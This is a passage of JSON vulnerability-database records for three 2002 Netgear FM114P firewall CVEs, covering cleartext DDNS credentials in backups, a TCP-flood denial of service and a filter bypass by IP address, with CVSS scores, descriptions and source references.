"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.9,
"vendor": "netgear",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"db": "BID",
"id": "5943"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Marc Ruef\u203b marc.ruef@computec.ch",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
}
],
"trust": 0.6
},
"cve": "CVE-2002-2355",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2002-2355",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-6738",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2002-2355",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200212-519",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-6738",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6738"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. It includes Cable / DSL Prosafe 802.11b wireless firewall system. \n\n\u00a0Netgear FM114P Cable / DSL Prosafe 802.11b wireless firewall stores plain text account information during backup operations. Remote attackers can use this vulnerability to obtain account data to further attack the system. \n\n\u00a0When the FM114P Cable / DSL Prosafe 802.11b wireless firewall is configured for backup operation, the device will save the DDNS (DynDNS) account data in the system in clear text. A remote attacker can obtain account information by accessing this file to help the attacker further attack the WEB interface. \n\n\u00a0It must be noted that the backup configuration option is not enabled by default",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2355"
},
{
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"db": "BID",
"id": "5943"
},
{
"db": "VULHUB",
"id": "VHN-6738"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-2355",
"trust": 2.3
},
{
"db": "BID",
"id": "5943",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2002-3810",
"trust": 0.6
},
{
"db": "XF",
"id": "114",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20021010 PLAIN TEXT DDNS PASSWORD IN NETGEAR FM114P BACKUPS",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "3652",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-6738",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"db": "VULHUB",
"id": "VHN-6738"
},
{
"db": "BID",
"id": "5943"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"id": "VAR-200212-0872",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-6738"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:21:56.054000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6738"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/5943"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/294740"
},
{
"trust": 1.7,
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/3652"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6738"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"db": "VULHUB",
"id": "VHN-6738"
},
{
"db": "BID",
"id": "5943"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"date": "2002-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-6738"
},
{
"date": "2002-10-10T00:00:00",
"db": "BID",
"id": "5943"
},
{
"date": "2002-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"date": "2002-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-6738"
},
{
"date": "2002-10-10T00:00:00",
"db": "BID",
"id": "5943"
},
{
"date": "2002-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-519"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2002-2355"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P Wireless Firewall Remote Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3810"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-519"
}
],
"trust": 0.6
}
}
VAR-200212-0871
Vulnerability from variot - Updated: 2025-04-03 22:21Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. It includes Cable / DSL Prosafe 802.11b wireless firewall system.
Netgear FM114P Cable / DSL Prosafe 802.11b wireless firewall does not handle TCP connections correctly. Remote attackers can use this vulnerability to conduct denial of service attacks.
The FM114P Cable / DSL Prosafe 802.11b wireless firewall includes a WEB interface.
Normal function must be restored by manual restart. A reboot of the device is necessary to resume normal operation
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200212-0871",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fm114p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.9,
"vendor": "netgear",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"db": "BID",
"id": "5940"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Marc Ruef\u203b marc.ruef@computec.ch",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
}
],
"trust": 0.6
},
"cve": "CVE-2002-2354",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2002-2354",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-6737",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2002-2354",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200212-314",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-6737",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6737"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. It includes Cable / DSL Prosafe 802.11b wireless firewall system. \n\n\u00a0Netgear FM114P Cable / DSL Prosafe 802.11b wireless firewall does not handle TCP connections correctly. Remote attackers can use this vulnerability to conduct denial of service attacks. \n\n\u00a0The FM114P Cable / DSL Prosafe 802.11b wireless firewall includes a WEB interface. \n\n\u00a0Normal function must be restored by manual restart. \nA reboot of the device is necessary to resume normal operation",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2354"
},
{
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"db": "BID",
"id": "5940"
},
{
"db": "VULHUB",
"id": "VHN-6737"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-2354",
"trust": 2.3
},
{
"db": "BID",
"id": "5940",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2002-3807",
"trust": 0.6
},
{
"db": "XF",
"id": "114",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20021010 TCP FLOOD AGAINST NETGEAR FM114P",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "3653",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-6737",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"db": "VULHUB",
"id": "VHN-6737"
},
{
"db": "BID",
"id": "5940"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"id": "VAR-200212-0871",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-6737"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:21:55.964000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6737"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/5940"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"trust": 1.7,
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/3653"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6737"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"db": "VULHUB",
"id": "VHN-6737"
},
{
"db": "BID",
"id": "5940"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"date": "2002-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-6737"
},
{
"date": "2002-10-10T00:00:00",
"db": "BID",
"id": "5940"
},
{
"date": "2002-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"date": "2002-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3807"
},
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-6737"
},
{
"date": "2002-10-10T00:00:00",
"db": "BID",
"id": "5940"
},
{
"date": "2002-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-314"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2002-2354"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P Wireless Firewall TCP Connection Remote Denial of Service Attack Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3807"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-314"
}
],
"trust": 0.6
}
}
VAR-200212-0308
Vulnerability from variot - Updated: 2025-04-03 22:21NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. The firewall module supports filtering of domain names.
The Netgear Fm114P firewall module checks that address filtering is not sufficient.
The Netgear Fm114P firewall module cannot resolve host names and domain names by default. Users can bypass the rule restrictions by entering IP instead of host names or domain names. FM114P Prosafe firewalls are a hardware solution manufactured and distributed by Netgear. It has been reported that FM114P firewalls do not sufficiently check addresses when requests are made. Because of this, it would be possible for a user behind the system to reach a restricted-access site by requesting the site on the basis of IP address
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200212-0308",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fm114p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.9,
"vendor": "netgear",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"db": "BID",
"id": "5667"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Marc Ruef\u203b marc.ruef@computec.ch",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
}
],
"trust": 0.6
},
"cve": "CVE-2002-1877",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2002-1877",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-6260",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2002-1877",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200212-511",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-6260",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6260"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. The firewall module supports filtering of domain names. \n\n\u00a0The Netgear Fm114P firewall module checks that address filtering is not sufficient. \n\n\u00a0The Netgear Fm114P firewall module cannot resolve host names and domain names by default. Users can bypass the rule restrictions by entering IP instead of host names or domain names. FM114P Prosafe firewalls are a hardware solution manufactured and distributed by Netgear. \nIt has been reported that FM114P firewalls do not sufficiently check addresses when requests are made. Because of this, it would be possible for a user behind the system to reach a restricted-access site by requesting the site on the basis of IP address",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-1877"
},
{
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"db": "BID",
"id": "5667"
},
{
"db": "VULHUB",
"id": "VHN-6260"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-1877",
"trust": 2.3
},
{
"db": "BID",
"id": "5667",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2002-3535",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "3475",
"trust": 0.6
},
{
"db": "XF",
"id": "114",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-6260",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"db": "VULHUB",
"id": "VHN-6260"
},
{
"db": "BID",
"id": "5667"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"id": "VAR-200212-0308",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-6260"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:21:55.936000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6260"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
